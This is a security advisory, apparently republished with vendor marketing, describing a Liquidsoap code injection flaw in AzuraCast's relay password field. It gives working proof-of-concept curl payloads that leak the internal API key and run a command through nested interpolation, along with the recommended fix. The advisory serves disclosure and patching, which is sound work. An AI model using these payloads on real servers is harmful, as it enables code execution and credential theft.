GHSA-q4ph-8x8g-95f8
HIGHAzuraCast Vulnerable to Liquidsoap Code Injection via Incomplete cleanUpString-to-toRawString Migration in Remote Relay Password Field
Blast Radius
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Description
Summary
The cleanUpString() method in ConfigWriter.php uses an ungreedy regex to strip Liquidsoap string interpolation patterns (#{...}) from user input. This regex can be bypassed via nested interpolation syntax (#{#{EXPR}}), allowing injection of arbitrary Liquidsoap code. Commit ff49ef4 migrated most user-controlled fields to the safe toRawString() method but left the remote relay password field using the vulnerable cleanUpString(). A user with the RemoteRelays station permission can achieve arbitrary code execution in the Liquidsoap process, leak internal API keys, or disrupt station operation.
Details
The Vulnerable Sanitizer
cleanUpString() at backend/src/Radio/Backend/Liquidsoap/ConfigWriter.php:1349-1367:
public static function cleanUpString(?string $string): string
{
$string = str_replace(['"', "\n", "\r"], ['\'', '', ''], $string ?? '');
// Remove strings that are interpolated
$string = preg_replace(
'/#{(.*)}/U', // Ungreedy: matches minimum chars to first }
'$1',
$string
);
$string = preg_replace(
'/\$\((.*)\)/U',
'$1',
$string ?? ''
);
return $string ?? '';
}
The /U (ungreedy) flag causes .* to match the minimum characters until the first }. With nested input #{#{EXPR}}:
- Regex finds
#{at position 0 - Ungreedy
.*matches#{EXPR(stops at the first}) - Full match consumed:
#{#{EXPR}— replacement with capture group$1yields:#{EXPR - The trailing
}is appended by the regex engine (it was outside the match) - Final result:
#{EXPR}— a valid Liquidsoap string interpolation expression
The Incomplete Patch
Commit ff49ef4 ("Use raw strings for user-input strings to avoid interpolation", 2026-03-06) correctly migrated host, username, mount, name, description, genre, and URL fields to toRawString(). However, the password field was left using cleanUpString():
ConfigWriter.php:1208-1215:
$password = self::cleanUpString($source->password); // Still vulnerable
$adapterType = $source->adapterType;
if (FrontendAdapters::Shoutcast === $adapterType) {
$password .= ':#' . $id;
}
$outputParams[] = 'password = "' . $password . '"'; // Double-quoted = interpolated
The password is embedded in a Liquidsoap double-quoted string, which evaluates #{...} interpolation expressions.
Why toRawString() Is Safe
toRawString() uses Liquidsoap raw string delimiters ({str_xxxxx|...|str_xxxxx}) which do not perform interpolation, making them immune to this attack class.
The Input Path
- Attacker sends
PUT /api/station/{station_id}/remote/{id}withsource_passwordcontaining the nested payload - Entity setter truncates to 100 chars via
mb_substr(payloads fit within this limit) - No validation on password content
- On station config regeneration,
ConfigWriter::getOutputString()callscleanUpString()on the password - Bypass produces valid interpolation, embedded in double-quoted Liquidsoap string
- Liquidsoap evaluates the interpolation when loading the config
PoC
Step 1: API Key Disclosure (38 chars)
# Set malicious password on an existing remote relay
curl -X PUT "http://azuracast.local/api/station/1/remote/1" \
-H "X-API-Key: $API_KEY" \
-H "Content-Type: application/json" \
-d '{"source_password": "#{#{settings.azuracast.api_key()}}"}'
After cleanUpString() processing, the password becomes #{settings.azuracast.api_key()}.
When Liquidsoap loads the config, the generated line:
password = "#{settings.azuracast.api_key()}"
evaluates to the internal API key value, which is then sent as the password to the remote relay server — observable by the attacker if they control the relay endpoint.
Step 2: Remote Code Execution (54 chars)
# RCE payload using string.char() to bypass quote filtering
curl -X PUT "http://azuracast.local/api/station/1/remote/1" \
-H "X-API-Key: $API_KEY" \
-H "Content-Type: application/json" \
-d '{"source_password": "#{#{process.run(string.char(105)^string.char(100))}}"}'
After processing: #{process.run(string.char(105)^string.char(100))} → executes id command.
string.char() and the ^ concatenation operator are used to build the command string without double quotes (which cleanUpString replaces with single quotes, and Liquidsoap doesn't support single-quoted strings).
Step 3: Trigger config regeneration
Restart the station or modify any station setting to force Liquidsoap config regeneration. The payload executes when Liquidsoap loads the new config.
The same bypass works with $($(EXPR)) via the second regex /\$\((.*)\)/U.
Impact
- Arbitrary code execution within the Liquidsoap process container via
process.run() - Internal API key disclosure via
settings.azuracast.api_key(), granting the attacker full internal API access to the station - File read/write within the Liquidsoap container via Liquidsoap's file operations
- Station disruption — malicious config can crash the Liquidsoap process
- Low privilege bar — requires only the
RemoteRelaysstation permission, not global admin
Recommended Fix
Replace cleanUpString() with toRawString() for the password field, consistent with the fix applied to all other fields in commit ff49ef4. The Shoutcast suffix append needs adjustment to work with raw strings:
// Before (vulnerable):
$password = self::cleanUpString($source->password);
$adapterType = $source->adapterType;
if (FrontendAdapters::Shoutcast === $adapterType) {
$password .= ':#' . $id;
}
$outputParams[] = 'password = "' . $password . '"';
// After (safe):
$password = $source->password ?? '';
$adapterType = $source->adapterType;
if (FrontendAdapters::Shoutcast === $adapterType) {
$password .= ':#' . $id;
}
$outputParams[] = 'password = ' . self::toRawString($password);
This uses the raw string delimiter which prevents all interpolation, matching the approach already used for host, username, mount, and all other user-controlled fields.
Additionally, consider removing cleanUpString() entirely or marking it as deprecated, since toRawString() is the correct approach for all Liquidsoap string values. Any remaining callers should be migrated.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | azuracast/azuracast | all versions | 0.23.6 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for azuracast/azuracast. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update azuracast/azuracast to 0.23.6 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-q4ph-8x8g-95f8 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-q4ph-8x8g-95f8 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-q4ph-8x8g-95f8. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-q4ph-8x8g-95f8 in your dependencies?
O3 detects GHSA-q4ph-8x8g-95f8 across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.